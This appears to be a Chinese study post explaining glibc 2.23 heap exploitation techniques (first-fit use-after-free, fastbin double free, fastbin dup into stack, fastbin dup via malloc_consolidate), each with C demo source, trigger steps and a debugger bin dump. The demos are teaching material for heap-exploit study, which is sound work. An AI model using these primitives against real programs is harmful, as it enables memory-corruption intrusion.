ubuntu 16.04
glibc 2.23

first_fit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main()
{
fprintf(stderr, "This file doesn't demonstrate an attack, but shows the nature of glibc's allocator.\n");
fprintf(stderr, "glibc uses a first-fit algorithm to select a free chunk.\n");
fprintf(stderr, "If a chunk is free and large enough, malloc will select this chunk.\n");
fprintf(stderr, "This can be exploited in a use-after-free situation.\n");

fprintf(stderr, "Allocating 2 buffers. They can be large, don't have to be fastbin.\n");
char* a = malloc(0x512);
char* b = malloc(0x256);
char* c;

fprintf(stderr, "1st malloc(0x512): %p\n", a);
fprintf(stderr, "2nd malloc(0x256): %p\n", b);
fprintf(stderr, "we could continue mallocing here...\n");
fprintf(stderr, "now let's put a string at a that we can read later \"this is A!\"\n");
strcpy(a, "this is A!");
fprintf(stderr, "first allocation %p points to %s\n", a, a);

fprintf(stderr, "Freeing the first one...\n");
free(a);

fprintf(stderr, "We don't need to free anything again. As long as we allocate smaller than 0x512, it will end up at %p\n", a);

fprintf(stderr, "So, let's allocate 0x500 bytes\n");
c = malloc(0x500);
fprintf(stderr, "3rd malloc(0x500): %p\n", c);
fprintf(stderr, "And put a different string here, \"this is C!\"\n");
strcpy(c, "this is C!");
fprintf(stderr, "3rd allocation %p points to %s\n", c, c);
fprintf(stderr, "first allocation %p points to %s\n", a, a);
fprintf(stderr, "If we reuse the first allocation, it now holds the data from the third allocation.\n");
}

漏洞:UAF
触发步骤:

  • 申请两个堆A,B,A大小0x512,B0x256字节(大于fastbin)
  • 释放0x512大小的堆A,但指针不置0
  • 再申请一个比0x512小的堆C

此时得到的堆C与堆A指针指向同一处
利用指向A的悬垂指针可以修改堆C的内容

fastbin_dup

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main()
{
fprintf(stderr, "This file demonstrates a simple double-free attack with fastbins.\n");

fprintf(stderr, "Allocating 3 buffers.\n");
int *a = malloc(8);
int *b = malloc(8);
int *c = malloc(8);

fprintf(stderr, "1st malloc(8): %p\n", a);
fprintf(stderr, "2nd malloc(8): %p\n", b);
fprintf(stderr, "3rd malloc(8): %p\n", c);

fprintf(stderr, "Freeing the first one...\n");
free(a);

fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
// free(a);

fprintf(stderr, "So, instead, we'll free %p.\n", b);
free(b);

fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
free(a);

fprintf(stderr, "Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\n", a, b, a, a);
a = malloc(8);
b = malloc(8);
c = malloc(8);
fprintf(stderr, "1st malloc(8): %p\n", a);
fprintf(stderr, "2nd malloc(8): %p\n", b);
fprintf(stderr, "3rd malloc(8): %p\n", c);

assert(a == c);
}

漏洞类型:double free
Fast bins 主要用于提高小内存的分配效率,单链表链接,默认情况下,对 SIZE_SZ 为 4B 的平台, 小于 64B 的 chunk 分配请求,对于 SIZE_SZ 为 8B 的平台,小于 128B 的 chunk 分配请求,首先会查找 fast bins 中是否有所需大小的 chunk 存在(精确匹配),如果存在,就直接返回

触发步骤:

  • 先申请三个堆a,b,c
  • 释放a
  • 释放b
  • 释放a

此时fastbin形成了循环,可以不断申请a,b处的内存
演示中先申请的a和后申请的c指向同一处

fastbin_dup_into_stack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
#include <stdio.h>
#include <stdlib.h>

int main()
{
fprintf(stderr, "This file extends on fastbin_dup.c by tricking malloc into\n"
"returning a pointer to a controlled location (in this case, the stack).\n");

unsigned long long stack_var;

fprintf(stderr, "The address we want malloc() to return is %p.\n", 8+(char *)&stack_var);

fprintf(stderr, "Allocating 3 buffers.\n");
int *a = malloc(8);
int *b = malloc(8);
int *c = malloc(8);

fprintf(stderr, "1st malloc(8): %p\n", a);
fprintf(stderr, "2nd malloc(8): %p\n", b);
fprintf(stderr, "3rd malloc(8): %p\n", c);

fprintf(stderr, "Freeing the first one...\n");
free(a);

fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
// free(a);

fprintf(stderr, "So, instead, we'll free %p.\n", b);
free(b);

fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
free(a);

fprintf(stderr, "Now the free list has [ %p, %p, %p ]. "
"We'll now carry out our attack by modifying data at %p.\n", a, b, a, a);
unsigned long long *d = malloc(8);

fprintf(stderr, "1st malloc(8): %p\n", d);
fprintf(stderr, "2nd malloc(8): %p\n", malloc(8));
fprintf(stderr, "Now the free list has [ %p ].\n", a);
fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\n"
"so now we are writing a fake free size (in this case, 0x20) to the stack,\n"
"so that malloc will think there is a free chunk there and agree to\n"
"return a pointer to it.\n", a);
stack_var = 0x20;

fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);
*d = (unsigned long long) (((char*)&stack_var) - sizeof(d));

fprintf(stderr, "3rd malloc(8): %p, putting the stack address on the free list\n", malloc(8));
fprintf(stderr, "4th malloc(8): %p\n", malloc(8));
}

漏洞类型:double free —> fastbin_attack
触发步骤:

  • 申请8字节的堆a,b,c
  • 释放a,释放b,释放a,形成double free
  • 在栈上伪造size位0x20,并把fastbin中堆地址修改为指向size位-8处
  • 申请两次堆,得到指针指向栈上地址

(Fastbin_attack主要是通过修改fd指针,伪造一个fake_chunk)

fastbin_dup_consolidate

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

int main() {
void* p1 = malloc(0x40);
void* p2 = malloc(0x40);
fprintf(stderr, "Allocated two fastbins: p1=%p p2=%p\n", p1, p2);
fprintf(stderr, "Now free p1!\n");
free(p1);

void* p3 = malloc(0x400);
fprintf(stderr, "Allocated large bin to trigger malloc_consolidate(): p3=%p\n", p3);
fprintf(stderr, "In malloc_consolidate(), p1 is moved to the unsorted bin.\n");
free(p1);
fprintf(stderr, "Trigger the double free vulnerability!\n");
fprintf(stderr, "We can pass the check in malloc() since p1 is not fast top.\n");
fprintf(stderr, "Now p1 is in unsorted bin and fast bin. So we'will get it twice: %p %p\n", malloc(0x40), malloc(0x40));
}

漏洞类型:double free

fastbins除了在两次free之中加入另外一个free实现double free之外,还可以借助large bin中malloc_consolidate来绕过检查达到double free的目的

触发步骤:

  • 申请两个fast chunkA,B
  • 释放chunkA
  • 申请一个large chunk
  • 再释放chunkA
  • 申请两次chunk,都得到chunkA

原理:
glibc在分配large chunk(>1024字节)时,首先操作是判断fast bins是否包含chunk。如果包含,则使用malloc_consolidate函数将fastbin中的chunk合并,并放入unsortbins。根据大小放入small bins/large bins

所以再第二次释放A的时候,先前释放的A已经被放到了small bin中,所以不会触发double free检测

1
2
3
4
5
6
【第一次freeA,并申请large chunk后】
─────────────────────────── Small Bins for arena 'main_arena' ───────────────────────────
[+] small_bins[4]: fw=0x602000, bk=0x602000
→ Chunk(addr=0x602010, size=0x50, flags=PREV_INUSE)
[+] Found 1 chunks in 1 small non-empty bins.